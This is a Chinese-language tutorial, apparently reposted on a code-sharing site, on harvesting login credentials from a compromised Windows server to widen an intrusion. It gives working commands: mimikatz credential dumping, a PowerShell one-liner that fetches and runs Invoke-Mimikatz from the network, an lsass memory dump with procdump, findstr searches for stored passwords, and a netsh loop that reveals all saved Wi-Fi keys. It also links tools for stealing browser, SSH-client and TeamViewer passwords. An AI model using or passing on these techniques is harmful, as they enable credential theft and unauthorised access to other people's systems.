Windows下登錄憑證竊取技巧


拿到一台Windows服務器權限,收集各種登錄憑證以便擴大戰果。本篇分享幾個竊取Windows登錄憑證的技巧和工具。


 

1、Windows 本地密碼Hash

Windows的系統密碼hash默認情況下一般由兩部分組成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系統下hash密碼格式用戶名稱:RID:LM-HASH值:NT-HASH值。

例如:

Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040
用戶名稱為:Administrator
RID為:500
LM-HASH值為:AF01DF70036EBACFAAD3B435B51404EE
NT-HASH值為:44F077E27F6FEF69E7BD834C7242B040

破解方式一:hash在線破解網站:

https://www.objectif-securite.ch/ophcrack
http://cmd5.com


破解方式二:mimikatz
Github地址:https://github.com/gentilkiwi/mimikatz

mimikatz使用起來也非常簡單,提取Windows系統的明文密碼只需兩行命令:

privilege::debug
sekurlsa::logonpasswords

破解方式三:wce

wce的常用參數使用說明如下:
參數解釋:
    -l     列出登錄的會話和NTLM憑據(默認值)
    -s     修改當前登錄會話的NTLM憑據 參數:<用戶名>:<域名>:<LM哈希>:<NT哈希>
    -w     通過摘要式認證緩存一個明文的密碼

破解方式四:Powershell+mimikatz
直接利用poweshell來調用mimikatz抓取系統內的明文密碼。

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

破解方式五:prodump+mimikatz
procdump是微軟官方提供的一個小工具
微軟官方下載地址:https://technet.microsoft.com/en-us/sysinternals/dd996900

# 將工具拷貝到目標機器上執行如下命令(需要管理員權限,我選擇的版本是64位)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# 將生成的內存dump文件拷貝到mimikatz同目錄下,雙擊打開mimikatz執行情況如圖:
mimikatz # sekurlsa::minidump lsass.dmp
# Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full

2、抓取瀏覽器密碼

很多瀏覽器都提供了記住密碼的功能,用戶在登錄一些網站的時候會選擇記住密碼。
LaZagne:提取瀏覽器所保存的密碼
github項目地址:https://github.com/AlessandroZ/LaZagne

3、服務端明文密碼

在一些配置文件或日志里,明文記錄着敏感的密碼信息,如web.config、config.ini等文件,可通過手動翻查敏感目錄,也可以通過findstr命令來查找敏感文件和內容。

findstr /i /s "password" *.config
findstr /i /s "password" *.ini
findstr /i /s "password" *.xml

4、第三方運維工具托管密碼

常見的有Linux運維工具,如Putty、xshell、winscp等,RDP管理工具,Remote Desktop Organizer,遠控軟件:Teamviewer、向日葵、VNC等。
xshell 密碼解密工具:https://github.com/dzxs/Xdecrypt
提取WinSCP,PuTTY等保存的會話信息:https://github.com/Arvanaghi/SessionGopher
從內存中提權TeamViewer密碼的工具:https://github.com/attackercan/teamviewer-dumper
星號查看器—-一鍵破解星號密碼


5、查看電腦wifi密碼

# 查看電腦連接過的所有wifi
netsh wlan show profiles
# 查看wifi信號為Aaron的密碼
netsh wlan show profiles name="Aaron" key=clear
# CMD一鍵獲取 所有連接過的WIFI密碼
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

6、Windows密碼提取工具合集

各種Windows程序的免費密碼恢復工具,包括各種瀏覽器、郵箱、Windows網絡密碼、無線網絡密鑰。
IE瀏覽器提取密碼工具:https://www.nirsoft.net/toolsdownload/iepv.zip
Firefox 瀏覽器密碼提取工具:https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip
Chrome 瀏覽器密碼提取工具:https://www.nirsoft.net/toolsdownload/chromepass.zip
SVN密碼解密器:http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip
郵箱密碼提取工具:https://www.nirsoft.net/toolsdownload/mailpv.zip
提取.rdp文件中存儲的密碼:https://www.nirsoft.net/toolsdownload/rdpv.zip
MSSQL憑據密碼獲取工具:http://www.zcgonvh.com/post/mssql_credential_pwddump.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM